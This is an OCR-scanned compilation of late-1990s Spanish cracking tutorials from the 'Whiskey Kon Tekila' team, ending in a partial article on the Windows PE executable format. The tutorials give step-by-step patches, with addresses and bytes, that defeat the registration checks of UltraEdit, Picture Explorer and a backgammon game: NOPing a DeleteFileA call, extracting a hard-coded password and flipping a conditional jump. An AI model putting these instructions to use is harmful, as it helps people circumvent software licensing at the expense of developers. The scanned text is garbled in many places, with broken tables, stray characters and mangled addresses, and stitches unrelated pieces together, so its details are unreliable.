Flipante !! :0? ya nos ibamos y resulta que el programilla se las da de listo. Vaya vaya..... Esto no puede ser. :o( 


Ummmm, nos borra un archivo!!. ¿y? ¿donde esta el problema? 
Recurrimos otra vez a las funciones importadas por el UltraEdit ( buscalas en el listado muerto con el W32Dasm ). Ummmm, una 
funcion que nos borre un archivo..... joer, hay varias que ponen Delete: 


RegDeleteKeyA 

DeleteFileA <--- ¡Uy, QUE SUPERSORPRESAAAA !!! 
DeleteDC 

DeleteObject 


:0) Back to Softlce !!!. Repetimos el fake serial, cerramos el UltraEdit y vemos como nos crea el archivo 
uedit32.reg. Ahora ponemos el BreakPoint: " BPX DeleteFileA " cargamos el UltraEdit y PLAF, pantallazo y 
de vuelta al Softlce. 


Aterrizamos en: 


* Reference To: KERNEL32.DeleteFileA, Ord:0057h 


:004443BA FF1514644A00 Call dword ptr [004A6414] 
:004443C0 A174024D00 mov eax, dword ptr [004D0274] 
:004443C5 8065FC00 and byte ptr [ebp-04], 00 
:004443C9 83C0D4 add eax, FFFFFFD4 

:004443CC 8D4DEC lea ecx, dword ptr [ebp-14] 
:004443CF A37C024D00 mov dword ptr [004D027C], eax 
:004443D4 899E32070000 mov dword ptr [esi+00000732], ebx 


:004443DA E8CE950300 call 0047D9AD 


Ummm, ¿que tal si machacamos esa asquerosa llamadita a DeleteFileA? 
:004443BA FF1514644A00 Call dword ptr [00446414] 


La sustituimos por: :004443BA 909090909090 (6 NOPS ) 


Comprobamos si nos mantiene el archivo ....... SÍ funciona. Quiza te haya sorprendido la manera de enfocar este tutorial puesto 
que no es la mejor opcion para registrar este programa, la mas limpia quiero decir. Pero asi aprendes las guarreridas que se 
pueden hacer. Ademas, funciona ¿no? El Programa cree que nuestro numero de serie es correcto, con lo cual ya no nos aparece la 
molesta nag al principio. 

En la ventana de Help/About aparecemos como registrados, el programa no caduca y como ya no nos borra el archivo uedit32.reg 
Pe ya tenemos otra excelente herramienta ;0) 


Creo que no hace falta que te recuerde el propósito de estos tutoriales. ¿no? 


NOTA: Estos tutoriales pueden contener errores intencionados (puede ser que el autor se haya saltado la explicación de algún 
paso, errores en las direcciones de memoria......etc). 
El objetivo es que aprendas a crackear y que tengas ideas propias. ;0) 


ii======== A PERSONAL GREETZ *+-*-ko======= per 
Dasavant, Niabi, r00ster, ZEncrakz, Azrael, Klimpong, Zor 
Conde-Vampiro, Mac-Crack, Killer_P, ASTAGA, Harvestr, Iczelion 
JosephCo, Carpathia, Taylor, Tapu, Ivanopulo, EgoistE, Tornftdo, 
JUANDA, Leoworld, ReKiem, Neural_N, Netking, Russ97, 
Mr.Pink and of course all WKT Members ¡;o) 


* * 


|WHISKEY KON TEKILA| 
|Mr.WhiTe [WkT!99] | 
|http://wkt.tsx.org| 
|[http://ecd.tsx.org| 


* * 
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Whiskey Kon Tekila CrA Cking tEAm. 


HA. WKTTutoriazsite [PA 


DiFiCultAD DiFiCultAD 


| programA [Picture Explorer 1.2.1 W9S5 
A [AA a O ($26) 
a ra 


aran NagSrer Nag-Screen 

DEC aAD Amate 2) AMA 

hErrAmiEntAs W32Dasm 

FECHA [Diciembre 19987 Dm 1998 
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Introducción 


El objetivo sera encontrar el numero de registro real del programa. 


Al Atake 


Cuando arrancamos el Picture Explorer, nos sale directamente una Nag-Sereen recordandonos que 
estamos en una version Shareware y dandonos opcion a registrarla o escribir un Password que el nos da 
para trabajar en modo Shareware. 

Este Password que el nos da, y que sale en las lineas que hay encima de donde pide los campos, varia 
cada vez que arrancamos el programa. 


Si intentamos registrar el programa, vemos que nos pide tres campos: 


User Name: Mr.Grey 
Organization: Mr.Grey 
Password: 30071996 


pero si nos fijamos, el boton de Siguiente > esta desactivado hasta que se introduzca un Password 
correcto. 
En este momento, introduciremos el Password que el nos da y que es de 5 caracteres. 


Una vez introducido, el boton de Siguiente > se convierte en el boton Finalizar y esta activado, pulsar 
este boton y entraremos en el programa. 


Si miramos en el menu Help / About Picture Explorer... veremos que como registro, nos sale No 
register en lugar de lo que pusimos nosotros en la pantalla de registro. 
Esto nos servira para atacar la proteccion del programa desde el W32Dasm. 


Arrancar el W32Dasm y abrir una copia del fichero Picexpl.exe, una vez desensamblado, salvarlo para 
no tener que volverlo a hacer. 


Ir al menu Refs / String Data References y buscar la frase No register, una vez encontrada, hacer 
doble click sobre ella para situarnos en la parte de codigo que corresponda: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :004011DF (C) 


* Possible StringData Ref from Data Obj ->"No Register" 
| 

:0040125A BE74A14A00 mov esi, 004AA174 

:0040125F 8D4F5C lea ecx, dword ptr [edi+5C] 

:00401262 56 push esi 

:00401263 E864C40500 call 0045D6CC 

:00401268 56 push esi 

:00401269 8D8F98000000 lea ecx, dword ptr [edi+00000098] 
:0040126F E858C40500 call 0045D6CC 


Vemos que aqui se viene por un salto condicional en la linea :004011DF, luego esto quiere decir que en 
esa parte de codigo debe estar la verificacion de si se esta registrado o no, veamos esta parte de codigo: 


:00401174 33DB xor ebx, ebx 

:00401176 3C79 cmp al, 79 <-- Interesante 

:00401178 0F95C3 setne bl 

:0040117B 33C0 xor eax, eax 

:0040117D 80FA58 cmp dl, 58 <-— Interesante 

:00401180 OF95C0 setne al 

:00401183 03D8 add ebx, eax 

:00401185 33C0 xor eax, eax 

:00401187 807DF365 cmp byte ptr [ebp-0D], 65 <--— Interesante 
:0040118B OF95C0 setne al 

:0040118E 03D8 add ebx, eax 

:00401190 33C0 xor eax, eax 

:00401192 807DF273 cmp byte ptr [ebp-0E], 73 <-- Interesante 
:00401196 OF95C0 setne al 

:00401199 03D8 add ebx, eax 

:0040119B 33C0 xor eax, eax 

:0040119D 807DF178 cmp byte ptr [ebp-0F], 78 <-- Interesante 
:004011A1 OF95C0 setne al 

:004011A4 03D8 add ebx, eax 

:004011A6 33C0 xor eax, eax 

:004011A8 807DF078 cmp byte ptr [ebp-10], 78 <-- Interesante 
:004011AC OF95C0 setne al 

:004011AF 03D8 add ebx, eax 

:004011B1 33C0 xor eax, eax 

:004011B3 807DEF37 cmp byte ptr [ebp-11], 37 <-- Interesante 
:004011B7 OF95C0 setne al 

:004011BA 03D8 add ebx, eax 

:004011BC 33C0 xor eax, eax 

:004011BE 80F978 cmp cl, 78 <-—- Interesante 

:004011C1 OF95C0 setne al 

:004011C4 03D8 add ebx, eax 

:004011C6 33C0 xor eax, eax 

:004011C8 807DEE36 cmp byte ptr [ebp-12], 36 <-- Interesante 
:004011CcC OF95C0O setne al 

:004011CF 03D8 add ebx, eax 


:004011D1 33C0 xor eax, eax 

:004011D3 807DED35 cmp byte ptr [ebp-13], 35 <-- Interesante 
:004011D7 OF95C0 setne al 

:004011DA 03D8 add ebx, eax 

:004011DC 895DE0 mov dword ptr [ebp-20], ebx 

:004011DF 7579 jne 0040125A <-—- No registrado 


:004011E1 CC int 03 
:004011E2 C3 ret 


Poner atencion a las lineas anteriores al salto a la rutina de error, en las comparaciones o CMPs que hay 
sobre valores fijos y que en total son 10. 
estas comparaciones son: 


¡AL DL ¡EBP-D EBP-E ¡EBP-F |¡EBP-10 ¡EBP-11 ¡CL EBP-12 ¡[EBP-13 
¡Hexadecimal [79 [58 | 65 | 73 | 78 78 37 [78 | 36 35 
¡ASCH ly [x[ e x x 7 [|x| 6 5 
Como se puede suponer, este es el Password de registro real y que ademas es siempre el mismo. 


Mirando unas lineas mas arriba de donde empieza la rutina de comprobacion, podemos ver como hay 
que colocar el Password para que coincida luego con la comprobacion: 


:00401142 8A5001 mov dl, byte ptr [eax+01] 
:00401145 8A08 mov cl, byte ptr [eax] <-- 1 caracter 

:00401147 8855ED mov byte ptr [ebp-13], dl <-- 2 caracter 
:0040114A 8A5002 mov dl, byte ptr [eax+02] 
:0040114D 8855F0 mov byte ptr [ebp-10], dl <-- 3 caracter 
:00401150 8A5003 mov dl, byte ptr [eax+03] 
:00401153 8855EE mov byte ptr [ebp-12], dl <-- 4 caracter 
:00401156 8A5004 mov dl, byte ptr [eax+04] 
:00401159 8855F1 mov byte ptr [ebp-0F], dl <-- 5 caracter 
:0040115C 8A5005 mov dl, byte ptr [eax+05] 
:0040115F 8855EF mov byte ptr [ebp-11], dl <-- 6 caracter 
:00401162 8A5006 mov dl, byte ptr [eax+06] 
:00401165 8855F2 mov byte ptr [ebp-0E], dl <-- “7 caracter 
:00401168 8A5007 mov dl, byte ptr [eax+07] 
:0040116B 8855F3 mov byte ptr [ebp-0D], dl <-- 8 caracter 
:0040116E 8A5008 mov byte ptr [eax+08] <-—- 9 caracter 
:00401171 8A4009 mov byte ptr [eax+09]<-- 10 caracter 


ss 


H 
sa 


voces. ccocoecoo 


H 
sa 


Partimos de la base de que en el registro EAX esta el Password correcto y haciendo un seguimiento de 
los movimientos, obtenemos el siguiente resultado: 


e S 


E 
— 
Exe 


Ahora ya tenemos el Password correcto. 
Solo nos queda volver a ejecutar el programa y rellenar los campos de la siguiente manera: 


User Name: Mr.Grey 
Organization: Mr.Grey 


Password: x5x6x7seX y 


Tener en cuenta que como la clave es unica, en los campos de User Name y Organization, se puede 
poner lo que se quiera. 
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Introducción 


El programa controla que no se puedan jugar más de 9 partidas sin haberse registrado. 
Per ello, utiliza 2 marcadores para guardar el número de partidas jugadas : 


e enel registro, en 
HKEY_LOCAL_MACHINEISOFTWAREWinGames.InAProBackgammoniGames 
Played 

e enun fichero, el CAWindowsW gi.Ini en el offset 240 


Al iniciarse el programa, se leen estos dos valores, y si son diferentes o mayores de 9, no se 
podrá jugar ninguna partida. 


Al Atake 


Si sólo se quiere poner el contador de partidas a O, se puede hacer a mano, editando el registro con el 
RegEdit, y modificando el Wg¡1.Ini con un editor hexadecimal. 

(O sea, editar el CAWindowsW gi.Ini y en el offset 240 poner 00. Después ejecutar el RegEdit.Exe, 
buscar "games played" y poner el valor 0 ) 

Pero claro, no es ni cómodo ni elegante, así que mejor meterse en el pgm... ;-) 


Abrir el WDasm, Open File to Disassemble y cargar el ProBack.Exe. 
Ahora que ya tenemos el pgm desensamblado, vamos a cargarlo con Ctrl-L (Load Process). 
Va bene, ahora ya podemos empezar a debugarlo. 


Mirar en Refs/String Data References para ver que textos utiliza el pgm. 
Al hacer doble click sobre uno de ellos, se mostrará en que parte del código se usa. 
Seguir haciendo doble click para ver las siguientes localizaciones. 


En este caso, el valor que nos puede interesar es "Registration Number". 

Después de hacer doble click, apretamos PF2 para poner un BreakPoint. O sea, que el debugger se 
parará en esta instrucción. 

En total, hay 5 referencias a "Registration Number". 

Mirando un poco el código de alrededor de los BreakPoints, se pueden ver las llamadas a las 
funciones del API de windows. 

Así podemos intuir que se hace con el "Registration Number” en cada uno de los 5 BreakPoints : 


e El primero(Line:26749 Pg 319) es para la llamada a RegQueryValueExA 
e El segundo i cuarto (Line:26807 1 28940) son para la llamada a RegCreateKeyExA 
e El tercero i quinto (Line:26829 1 28966) son para la llamada a RegSetValueExA 


Iniciamos la ejecución del pgm con PF9(Run), y se parará en :0040FB5C ,(Line:26749 Pg 319) : 


* Possible StringData Ref from Data Obj ->"Registration Number" 


:0040FB5C 6834764400 push 00447634 

:0040FB61 50 push eax 

:0040FB62 C744243404000000 mov [esp+34], 00000004 
:0040FB6A FFD7 Call edi 

:0040FB6C 85C0 test eax, eax 

:0040FB6E 7404 je 0040FB74 

:0040FB70 895C2424 mov dword ptr [esp+24], ebx 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0040FB6E (C) 


:0040FB74 8B4C2410 mov ecx, dword ptr [esp+10] 
:0040FB78 51 push ecx 
:0040FB79 FFD5 call ebp 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0040FB4A(C) 


:0040FB7B 8B542414 mov edx, dword ptr [esp+14] 
:0040FB7F 52 push edx 
:0040FB80 FFD5 call ebp 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0040FB2F (C) 


:0040FB82 8B442424 mov eax, dword ptr [esp+24] 
:0040FB86 8B4C2418 mov ecx, dword ptr [esp+18] 
:0040FB8A 3BC1 cmp eaxX, ecx 
:0040FB8C 0F84AA000000 je 0040FC3C 


Después de unos pocos PES, se llega a :0040FB8C je 0040FC3C ,(Line:26777 Pg 319) 
Caliente,caliente ;-))) Que pasaria si en lugar de "je" hubiera un "¡ne" ;-? ;-DDD 

Pues sí, un simple BIT (de je(84h) a jne(85h)) hace que todas las protecciones queden anuladas (tanto 
la pantalla de propaganda inicial, como el límite de las 9 partidas ;-) 


Os recomiendo imprimir las páginas 319-321 y intentar seguirlas un poco juntamente con el Debug 
para ver por donde va pasando y que va haciendo. 
Por ejemplo, la comprobación de partidas jugadas se hace en : 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0040FC70(C) 


:0040FCC7 A1F8B54400 mov eax, dword ptr [0044B5F8] 
:0040FCCC 8B542410 mov edx, dword ptr [esp+10] 
:0040FCDO B90B000000 mov ecx, 0000000B 

:0040FCD5 3B5004 cmp edx, dword ptr [eax+04] 
:0040FCD8 7407 je 0040FCE1 

:0040FCDA 894C2410 mov dword ptr [esp+10], ecx 
:0040FCDE 894804 mov dword ptr [eax+04], ecx 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0040FCD8 (C) 

:0040FCE1 394C2410 cmp dword ptr [esp+10], ecx 
:0040FCE5 730A jnb 0040FCF1 

:0040FCE7 C705C8B5440001000000 mov dword ptr [0044B5C8], 00000001 


El valor del registro "games played" está en EDX, el valor del fichero Wg1.Ini está en EAX, y el 
máximo de partidas permitidas está en ECX (0Bh=10d) 


Ya para acabar, sólo falta modificar el fichero ProBack.Exe con un Editor hexadecimal. 
Es facil localizar la posición, ya que el Wdasm indica el offset dentro del fichero. (Ej: E-Offset 
0000EF8SCh in File:ProBack.exe) 
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Introducción 


He tenido noticias de algunos interesados en conocer sobre un tema en el que he estado trabajando: el formato de los 
archivos ejecutables portables, conocidos como los "PE files". Como acostumbro a llevar notas de lo que hago, he 
reunido y ordenado este material esperando que pueda ser útil. No me responsabilizo del uso que hagan otros de él. 


PE es el formato adoptado por W32 (Windows a 32 bits) para sus archivos ejecutables (EXE), sus librerías dinámicas 


(DLL), dispositivos virtuales (VXD), etc. W32 adoptó este formato debido a las posibilidades que quedaban abiertas al 
implementar direcciones y punteros de 32 bits y debido al manejo de la memoria que estas posibilidades exigían. 


ALGO SOBRE MEMORIA VIRTUAL 


W32 implementa un manejo de memoria que supone paginación, dividide la memoria física en bloques de memoria fija 4 
KB llamados "páginas". Al proceso de dividir la memoria en páginas se llama paginación. Se trata de una técnica muy 
empleada en los sistemas operativos multitareas (capaces de ejecutar más de una tarea al mismo tiempo) para manejar la 
memoria dinámica del sistema (RAM = Randow Access Memory = Memoria de Acceso Aleatorio) de manera que 
ninguna tarea altere los datos de otra o la intervenga negativamente en su comportamiento. 


W32 emplea punteros y direcciones de 32 bits. Esto quiere decir que, si lo tuvieramos, podríamos usar una memoria de 
4GB para cada programa en ejecución. Pero aunque no tengamos todavía ships con esta capacidad de memoria, los 
programas en W32 corren como si la tuvieran a su disposición. El sistema W32 asigna a cada proceso o programa en 
ejecución un espacio de direcciones ficticio de 4GB, un montón de memoria que sólo existe imaginariamente, llamada 
"memoruia virtual". Luego, para ejecutar código del programa o disponer de sus datos, transforma, a través de un par de 
tablas, las direcciones ficticias en direcciones reales en la memoria física. 


Para comprender cómo W32 transforma direcciones virtuales en direcciones físicas para que el CPU pueda acceder a las 
instrucciones del programa montadas en la RAM, sugiero la lectura del artículo "La Memoria en W32: intro" que 


seguramente acompaña a este que lees ahora. 


El tema de la memoria virtual da para más y conviene tratarlo aparte. Ahora nos ocupan los PE. 
- 
Vi 


Teoría y un poco de práctica.. 


ARCHIVOS EN GENERAL Y EL FORMATO PE 


Un archivo no es más que un conjunto de datos organizados en varias entidades llamadas "registros". Un registro es lo 
que conocemos en programación como "estructura", es decir, un espacio en memoria que se emplea para guardar datos 
de manera ordenada. 


Una estructura se divide en entidades de tamaño definido destinadas a almacenar datos de justo ese tamaño. A cada una 
de estas "celdas" de la estructura la llamamos campos. 


Las estructuras o registros permiten almacenar información, en sus campos, sobre entidades particulares. En este sentido, 
la estructura es una colección de campos que pueden ser tratados como una unidad por algún programa. Es un bloque de 
datos organizado en campos sobre una entidad específica.Toda estructura posee un nombre que la identifica y permite 
localizarla o manejarla; este nombre es una varable del tipo de la estrcuctura que nombra y permite el tratamiento de las 
entidades de las cuales informa la estrcutura. 


Ahora bien, a la información contenida en un archivo se puede acceder de manera secuencial o directa. El modo 
secuencial es lento en muchos casos ya que se necesita revisar cada dato desde el comienzo del archivo con orden 
secuencial, hasta dar con el buscado. Por esto, la mayoría de las veces lo mejor es ir directamente al dato buscado, sin 
tener que revisar todos los campos del archivo. 


Para facilitar el acceso directo a los datos, se pueden colocar unos directorios al comienzo del archivo que indiquen 
dónde se encuentran ciertos tipos de datos. Los directorios son estructuras cuyos campos, llamados entradas del 
directorio, son tablas que tienen la misma estrcutura. Funcionan como un "directorio" telefónico. Si busco un dato de 
cierto tipo, reviso el directorio y veo dónde están agrupados esos datos. Luego voy a la sección donde se encuentran los 
datos de este tipo. Seguramente en esta sección habrá una tabla que me informe sobre lo que hay en ella. Reviso entonces 
esta tabla y con lo que me dice, busco el dato que me interesa: no tengo que ir dato por dato para encontrar lo que busco. 


Este es el principio a partir del cual se ideó el formato de los archivos PE, y facilitar el montaje del programa en la RAM: 
se coloca al principio del archivo una serie de estructuras que informan sobre el contenido del archivo. El contenido del 
archivo se divide en secciones cada una con datos de cierto tipo, formando el cuerpo del archivo. Las estructuras al 
comienzo del archivo forman el encabezado del archivo y nos dicen la dirección donde se ubica cada sección, su tamaño 
y sus atributos. A la vez, cada sección implementa tablas con información particular sobre el contenido de su cuerpo. 


Entonces, en los archivos con formato PE, tenemos un encabezado y un cuerpo. El encabezado de los archivos PE se 
subdivide en, podríamos decir, cuatro subencabezados: 


El encabezado DOS MZ 

El encabezado PE 

El encabezado NT opcional 

El conjunto de tablas de secciones 


Veámos la organización en la siguiente tabla: 


PE EXE (Windows 32Bit EXE, DLL, OCX, etc) 


Contiene información necesaria para ejecutar el DOS 
STUB. Conservado por compatibilidad 


Encabezado MZ EXE 


El desol : OFESET) 3Ch 7 Encabezado DOS 
Encabezado MZ extendido esplazamiento ( ) apunta a 
encabezado PE 
Agregado para 


avisar que el 
programa rueda en 
Windows 


Usualmente despliega 'Requires windows to run' o un 
mensaje similar 


DOS STUB 


Encabezado PE Contiene info necesaria para correr el programa en 
Win32 
Contiene info adicional necesaria para correr el O 
Encabezado opcional NT ] P agregados por W32 
programa en Win32 


EEE PEA ., . . . 
Tabla de Objetos o Secciones Información sobre objetos o secciones en el archivo 


Datos de las secciones 


Objetos o secciones Cuerpo del archivo 


El cuerpo del archivo con formato PE se subdivide en un número no fijo de secciones, cada una de las cuales dividida 
también en una tabla de sección, que nos informa sobre el contenido de la sección, y el cuerpo de sus datos. 


Veamos ahora con detenimiento el encabezado. 


RASTROS ARCÁICOS: ENCABEZADO DOS MZ 


Los archivos ejecutables con formato PE inician con el encabezado DOS MZ, que no es más que el antiguo encabezado 
de los archivos EXE más algunos campos adicionales que se agregaron para posibilitar la transición. 


El encabezado DOS, conservado por compatibilidad, es el mismo que empleaban los antiguos programas DOS de 16 bits, 
más unos campos adicionales. Su estructura (en ensamblador) es: 


_IMAGE_DOS_ HEADER STRUC 
SII 
; CAMPOS TRADICIONALES 
SIA LIA AIR II 
e_magic DW ? 

e_cblp DW ? 

e_cp DW ? 

e_crlc DW ? 

e_cparhdr DW ? 

e_minalloc DW ? 

e_maxalloc DW ? 

e_ss DW ? 

e_sp DW ? 

e_csum DW ? 

e_ip DW ? 

e_cs DW ? 

e_lfarlc DW ? 

e_ovno DW ? 
SIA 

; CAMPOS ADICIONALES 
SIA 
e_res DW 4 DUP (?) 

e_oemid DW ? 

e_oeminfo DW ? 

e_res2 DW 10 DUP (?) 

e_lfanew DD ? 

_IMAGE_DOS_ HEADER ENDS 
PIMAGE_DOS_HEADER TYPEDEF NEAR PTR _IMAGE_DOS_ HEADER 


Quien no entienda esta estructura puede orientarse por la siguiente tabla: 


Encabezado EXE MZ 


10000 [Word [ID "MZ - Etiqueta de archivo EXE 
10002 [Word [Número de bytes en la última página o bloque de 512 bytes del ejecutable. 
10004 [Word [Número de todas las páginas de 512 bytes en el ejecutable (incluyendo la última) 
10006 [Word [Número de entradas de la tabla de relocalizaciones 
10008 [Word [Tamaño del encabezado en parágrafos (16 bytes) 


0004 (Word Tamaño mínimo de los parágrafos de memoria localizada por encima del final del programa ya 


cargado en RAM. 

Tamaño máximo de los parágrafos de memoria localizada por encima del final del programa 
000C ¡Word 

ya cargado en RAM. 


000E ¡Word ¡[SS (Stack Segment) relativo al inicio del ejecutable 
0010 ¡Word |SP (Stack Pointer) inicial 


0012 (Word Checksum o 0. Valor de verificación de la suma de las palabras en el ejecutable, usado para 


verificar la validación por posibles datos perdidos. 


0014 ¡Dword ¡CS:IP relativo al inicio del ejecutable (Entry point = Punto de entrada) 
0018 Word Desplazamiento (offset) de la tabla de relocalización. 

40h para los nuevos (NE, LE, LX, W3, PE, etc) ejecutables 
001A [Word ¡Número de traslape (0 = programa principal) 


El primer campo de esta estructura, en el desplazamiento 0000, hay dos caracteres: "MZ", que indican que se trata de un 
archivo ejecutable .EXE. 


Si abrimos con HEX WORKSHOP u otro editor hexadecimal un archivo .EXE de DOS, por ejemplo DEBUG.EXE, 
generalmente ubicado en el directorio CAWINDOWSICOMMAND, veremos en la parte izquierda, en la ventana que 
despliega caracteres en ASCII, que en el desplazamiento 0000 hay dos caracteres: "MZ. Es el número mágico que 
identifica los archivos .EXE. 


A este antiguo encabezado EXE MZ se le han agregado algunos campos que informan al cargador del Sistema Operativo 
(SO) dónde está el encabezado PE con información relevante para W32. 


Encabezado MZ Extendido 


Desplazamiento del nuevo encabezado EXE desde el inicio del archivo o 0 si es un archivo 
003C  [Dword MZ EXE 


El último campo de esta extensión, 'e_Ifanew', indica la dirección donde está la signatura que identifica el formato del 
archivo. Si se trata de un archivo con un programa W32, este campo apunta a dos caracteres: "PE" (Portable Executable), 
el formato elegido por M$ para los archivos con programas W32. 


Si abrimos NOTEPAD.EXE con con HEX WORKSHOP y revisamos el campo e_Ifanew en el desplazamiento 003Ch, 
veremos el número 8000h, que al revés es 0080h, el desplazamiento donde veremos los caracteres 'PE', que identifican el 


formato del archivo (Si trabajas con HEX WORKSHOP, no cierres todavía este archivo). Si ahora abrimos con HEX 
WORKSHOP el archivo WINFILE.EXE, generalmente ubicado en el directorio CAWINDOWS, veremos que el 
desplazamiento 003Ch apunta al desplazamiento 0400h, donde encontramos los caracteres 'NE', que es el formato de los 
archivos W16. 


Inmediatamente después de la signatura hay dos bytes o una palabra (WORD) con ceros, después de los cuales inicia el 
encabezado PE. En la actualidad, el formato NE está practicamente extinguido. Lo pasaré por alto y me concentraré en el 
formato PE. 


Entre el encabezado MZ DOS y la signatura PE, está la seccuón "STUB" del archivo, la cual se incluye para el 
despliegue de un mensaje que indica que el programa sólo puede correr en Windows. 


¿32 BITS?: MÁS CABEZAS 


Dos bytes delante de la signatura se inicia el encabezado PE, cuya estructura es: 


_IMAGE_FILE_HEADER STRUC 

Machine DW ? 

NumberOfSections DW ? ; No. de secciones 

TimeDateStamp DD ? 

PointerToSymbolTable DD ? ; Dir. de la tabla de símbolos 
NumberOfSymbols DD ? ; No. de simbolos 
SizeOfOptionalHeader DW ? ; Tamaño del proximo encabezado 
Characteristics DW ? 

_IMAGE_FILE_HEADER ENDS 


PIMAGE_FILE_HEADER TYPEDEF NEAR PTR _IMAGE_FILE_HEADER 
IMAGE_SIZEOF_FILE_HEADER EQU 20 


Traduzcamos ésta a estructura a una tabla a desplazamientos: 


Encabexado PE 


CPU_TYPE = Tipo de CPU 

0000 - Desconocido 0162 - MIPS I 
0000 [Word 014c - 80386 0163 - MIPS ll 

014d - S0486 0166 - MIPS III 

014e - 80586 


10002 [Word [Número de objetos en la tabla de Objetos 
10004 [Dword Estampa Tiempo 
10008 — [SBytes [Puntero ala tabla de simbolos 
10010 [Word [Tamaño del encabezado siguiente, encabezado opcional NT 


Banderas 
0012 [Word 0 - Imagen del Programa  — 2-EXE 
200 - Dirección fijada 2000 - Librería 


Uno de los campos más importantes de este encabezado es el segundo, en el desplazamiento 0004 desde el inicio del 
encabezado, que indica el número de secciones en el que se divide el ejecutable. Podemos ver en el volcado de 
NOTEPAD.EXE en HEX WORKSHOP, en el desplazamiento 0086h, el valor 0600h, que invertido es O0O06h, el número 
de secciones que hay en el archivo. 


Como dijimos al comienzo, el formato PE divide su contenido en varias secciones con información de tipo específico. El 
campo NumberOfSections indica este número. 


Otro campo que puede ser de utilidad es SizeOfOptionalHeader, que indica el tamaño del encabezado opcional, 
inmediatamente después del encabezado PE. Este valor para NOTEPAD.EXE está en el desplazamiento 94h y es EO00h, 
que invertido es OOEOh=224D, es decir, el encabezado opcional tiene un tamaño de 224 bytes. 


OTRA CABEZA MÁS 


Inmediatamente después inicia el encabezado opcional NT. Randy Katz, en su clásico artículo de 1993, "The Portable 
Executable File Format from Top to Bottom", divide este encabezado opcional en dos partes, una con campos standard y 
otra con campos adicionales: 


_IMAGE_OPTIONAL_HEADER STRUC 

SIA ALI 

; CAMPOS STANDARD 

SILA ALI 

Magic DW ? 

MajorLinkerVersion DB ? 

MinorLinkerVersion DB ? 

SizeOfCode DD ? ; Tamaño del codigo 

SizeOfTnitializedData DD ? ; Tamaño de datos inicializados 
SizeOfUninitializedData DD ? ; Tamaño de datos no inicializados 
AddressOfEntryPoint DD ? ; Dir. virtual del punto de entrada del prog. 
BaseOfCode DD ? ; Dir fisica de la base del cod. 

BaseOfData DD ? ; Dir fisica de los datos 
AAN 

; CAMPOS ADICIONALES NT 
AAA 

ImageBase DD ? ; Dir virtual de la base de la img. 
SectionAlignment DD ?, Alineamiento de secc. 

File Alignment DD ? ; Alinamiento de archivo 
MajorOperatingSystemVersion DW ? 

MinorOperatingS ystemVersion DW ? 

MajorImage Version DW ? 

MinorImageVersion DW ? 

MajorSubsystemVersion DW ? 

MinorSubsystemVersion DW ? 

Reservedl DD ? 

SizeOflmage DD ? ; Espacio reservado en memoria para el archivo 
SizeOfHeaders DD ? ; Tamaño del conjunto de los encabezados 
CheckSum DD ? 


Subsystem DW ? 

DliCharacteristics DW ? 

SizeOfStackReserve DD ? 

SizeOfStackCommit DD ? 

SizeOfHeapReserve DD ? 

Size OfHeapCommit DD ? 

LoaderFlags DD ? 

NumberOfRvaAndSizes DD ? 

DataDirectory_IMAGE_DATA_ DIRECTORY 16 DUP (<> ) ; Tabla de directorios 
_IMAGE OPTIONAL_HEADER ENDS ; de secciones 


PIMAGE_OPTIONAL_HEADER TYPEDEF NEAR PTR _IMAGE_OPTIONAL_HEADER 


A continuación la tabla de desplazamientos equivalentes para esta estructura: 


Encabezado opcional NT 


Campos Estandard 
MO MA RA 
10002 [Word [Versión delenlazador (LINKER) 
10004  [Dword [Tamaño de la sección o segmento de código 
10008  [Dword [Tamaño de la sección de datos inicializados 


0010 Dword Tamaño de la sección de datos no inicializados 
0014 Dreta Dirección virtual del punto de entrada (RVA: Relative Virtual Address) - La 
ejecución comienza aquí. 


10018 [Dword  [Basedela sección de Código 
001C — [Dword  Basedelasección de datos 
Campos Adicionales 
10020 [Dword  Basedela Imagen - inicio de la imagen en la memoria virtual. 
10028  [Dword Alineamiento del Archivo (Potencia de 2 512-64k) 
10032 [Dword Versión requerida de sistema operativo 
MOE A Rea 
10044 — [|Dword [Tamaño dela imagen: espacio reservado en memoria para el archivo. 
10048 Dra ama del naa 
1005C  [Dword ¡Suma de chequeo del archivo 


Subsistema 
005E Word 0 - Desconocido  1- Nativo 
2 - Win GUI 3 - Carácter Win 


0060 Word Banderas DLL 
0064 Dword Memoria reservada para la pila (stack) 


0078 [Dword— trogastas entradas RVA tienen tamaño Dword 


CAMPOS CRÍTICOS DEL ENCABEZADO 


- Tamaño de las secciones - 


Para montar el ejecutable, W32 necesita reservar espacio en memoria. Como hemos adelantado, W32 no divide la 
memoria en segmentos de 64KB como lo hacía DOS sino en secciones de tamaño variable. Los campos SizeOfCode, 
SizeOfTnitializedData y SizeOfUninitializedData, informan el espacio de memoria que el sistema debe reservar para 
cargar cada una de estas secciones. 


Estos valores para NOTEPAD.EXE, tal como puede verse en los desplazamientos 009Ch, OOAO0h y 00A4h, 
respectivamente son 0000 3A00h (tamaño de la sección de código), 0000 4600h (tamaño de la sección de datos 
inicializados) y 0000 0000h (no hay sección de datos no inicializados). 


- Punto de entrada (RVA Entry Point) - 


Otro dato que necesita el sistema para ejecutar el programa en el archivo es el punto de entrada, es decir, la dirección de 
la primera instrucción del programa. Esta información se encuentra en el campo AddressOfEntryPoint, que sigue al 
campo SizeOfUninitializedData del encabezado opcional NT. Para NOTEPAD.EXE este valor, en el desplazamiento 
00A8h, es 0010 0000h, que invertido es 0000 1000h. 


RVA es la abreviatura de Relative Virtual Address, que en español significa Dirección Virtual Relativa. Significa una 
dirección virtual, no real, relativa a la base del archivo. El valor de la base del archivo se encuentra en el campo 
ImageBase (Base de la Imagen). 


- Bases de las secciones - 


Los campos BaseOfCode y BaseOfData indican las direcciones virtuales relativas (RVAs) a la base del archivo de la 
sección de código y de la sección de datos, respectivamente. En NOTEPAD.EXE, estos valores se encuentran en los 
desplazamientos OODACH y O0BOHh y son, respectivamente, 0000 1000h para la sección de código, y 0000 5000h para la 
sección de datos. 


Observa que, para NOTEPAD.EXE, la base del código (BaseOfCode) coincide con el punto de entrada del programa 
(EntryPoint). Quiere decir que el programa inicia en la primera instrucción de la sección de código. 


- Base de la imagen (Image Base) - 


